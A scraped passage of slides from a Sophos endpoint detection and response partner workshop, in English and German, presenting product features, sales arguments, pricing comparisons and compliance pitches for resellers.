![Page 63: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/63.jpg)
Threat Analysis Center
63
EDR Across Endpoint and Server
All threat cases, alerts and searches, across all device types
![Page 64: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/64.jpg)
Security analysis: Cross-estate threat hunting
![Page 65: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/65.jpg)
Threat intelligence analysis: Access on-demand threat intelligence curated by SophosLabs
![Page 66: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/66.jpg)
Malware Analysis
Analyze files using deep learning
![Page 67: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/67.jpg)
Understand your security posture with guided investigations
![Page 68: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/68.jpg)
Respond with the click of a button
![Page 69: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/69.jpg)
Threat insight
69
Authentication EventsLogon attempts and credential history
ExecutablesHunt and investigate potential malware
PowershellScripts, malicious IT tools, hacker tools, Cmd line pgms
![Page 70: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/70.jpg)
Publikumsbeteiligung 2
70
![Page 71: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/71.jpg)
4 vertriebliche Ansätze
71
![Page 72: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/72.jpg)
Marktführender Schutz
• Deep Learning
• Anti-Ransomware
• Anti-Exploit
• Web/Device/AppControl
• Ursachenanalyse
• Synchronized Security
Advanced
![Page 73: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/73.jpg)
Marktführender Schutz
• Deep Learning
• Anti-Ransomware
• Anti-Exploit
• Web/Device/AppControl
• Ursachenanalyse
• Synchronized Security
Advanced Advanced with EDR
Zusätzlich• Antworten auf die Fragen
• Hat sich eine Bedrohung ausgebreitet?
• Ist ein Angriff noch im Gange?
• Gibt es „schlafende“ Bedrohungen?
• Sind Daten gestohlen worden? -> DSGVO/Compliance!
• Unternehmensweite Suche + Eindämmung von Bedrohungen
![Page 74: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/74.jpg)
Sales 1
74
![Page 75: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/75.jpg)
Beste Lösung am Markt – größtes Pflaster
75
• Glücksfall: Kunde kauft immer besten Schutz (z.B. wegen DSGVO)
• Kunde sagt: das ist zu teuer. Wo ist der Mehrwert gegenüber AV?o Compliance
o Sichtbarkeit
o Schutz
o Vorfallsbearbeitung
o Automatische Reaktion
• Ist Sophos wirklich teuer? Zum Vergleich:o Kaspersky + Crowdstrike + Cylance ist teuerer als Sophos
o Microsoft M365 E5 (5 Konsolen) = 58 USD/Monat/Arbeitsplatz
o Personalaufwand für das Management mehrere Konsolen
o Ausfallzeiten/Analyseaufwand nach Vorfall
![Page 76: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/76.jpg)
Beweis: Bester Schutz und niedrigste Gesamtkosten
NSS Labs ADVANCED ENDPOINT PROTECTION COMPARATIVE REPORT MAR 2019
![Page 77: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/77.jpg)
Sales 2
77
![Page 78: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/78.jpg)
Vorfallsbearbeitung & Analyse
• Kunde meldet Angriff
• Installation CIXAEDR
• Stoppen des Angriffs
• Analyseo Was ist genau passiert?o Ereignisketteo Sophos Labs in a Box -> KI-Unterstützung bei der Analyseo Hat sich die Bedrohung ausgebreitet? Ist sie noch im Gange?o Sind Daten abgeflossen?
• Zielgruppeo IT-Admins, IT-Manager
• Mehrwert für Partnero Lead-Gen
![Page 79: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/79.jpg)
Beweis: Umfrage unter 3.100 IT-Verantwortlichen
Umfrage unter 3.100 IT-Verantwortliche weltweit in Unternehmen von 100-5.000 Mitarbeitern, Zeitraum Dez. 2018 - Jan.2019
StundenReaktionszeit
73%wurden
2018Opfer
durchschnittlichzweimal
wissen nicht, wiesie infiziert wurden
20%
4 TageAufwand pro Monatfür Untersuchungen, davon 85% umsonst
![Page 80: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/80.jpg)
Sales 3
80
![Page 81: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/81.jpg)
Compliance
• DSGVO, PCI, HIPAA, SOX, KRITIS, Basel III, Risk Management
• Schutz von Daten nach „Stand der Technik“ gefordert (AV+Firewall NICHT Stand der Technik)
• Nachweispflicht, ob bei Sicherheitsvorfall Daten abgeflossen sind
• Risikomanagemento Kosten des Vorfalls <-> Kosten der Sicherheit
• Zielgruppe:o CISO, CEO, CFO
• Mehrwerto Nicht-Tech/SMT Ansprechpartner
![Page 82: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/82.jpg)
Beweis
82
![Page 83: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/83.jpg)
Sales 4
83
![Page 84: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/84.jpg)
Sichtbarkeit, Aussagefähigkeit
84
• Sind wir betroffen? o Angriff XY, CVE, Admin-Tools
• Sind wir geschützt?
• IOC (IPs, URLs, Hashes)
• Verdächtiges Schwarmverhalten/Grauzone
• Zielgruppe:o IT-Manager
• Mehrwert für Partnero Service
![Page 85: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/85.jpg)
Beweis
85
![Page 86: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/86.jpg)
Beweis
• Kunden fragen Partner
• „Wären wir mit dem Kauf der Sophos Lösung gegen Emotet, LockerGoga, MegaCortex, WannaCry etc. geschützt?“
• Neben der Tatsache, dass die Lösung nach aktuellsten Tests die beste Schutzwirkung hat, beinhaltet sie auch die Schnittstelle zu einem Expertensystem, um diese Fragen zu beantworten
• „Hat Sie schon jemals ein Kunde gefragt, ob er gegen die Bedrohung aus der Tagesschau gestern Abend geschützt ist?“
![Page 87: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/87.jpg)
Tools für Beweis
87
![Page 88: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/88.jpg)
Ausblick?
88
![Page 89: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/89.jpg)
Improved Reports
89
Setup scheduled reportso Define report criteriao Schedule an Email notificationo Link or attached document
Endpoint Protection Summary
Available NOW
![Page 90: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/90.jpg)
Admin Tool – PowerShell usage
90
All use of PowerShell is recorded and searchable from central.
• Isolate Device while investigating
• Generate Forensics Snapshot to dive deep
Available NOW
![Page 91: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/91.jpg)
Threat Indicators – Suspect executables
91
• Identification of most suspect executables across all devices
• Priority ranked based on new machine learning model
• Generate Threat case to investigate and take action
![Page 92: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/92.jpg)
Publikumsbeteiligung 3
93
![Page 93: Endpoint Detection and Response Workshop · Some Good News –Use of Exploit Kits has fallen sharply 23 Fileless Attack Criminal uses o Infect victim via Malvertising o Deliver Ransomware,](https://reader030.vdocuments.mx/reader030/viewer/2022040615/5f0ff6847e708231d446c1ee/html5/thumbnails/93.jpg)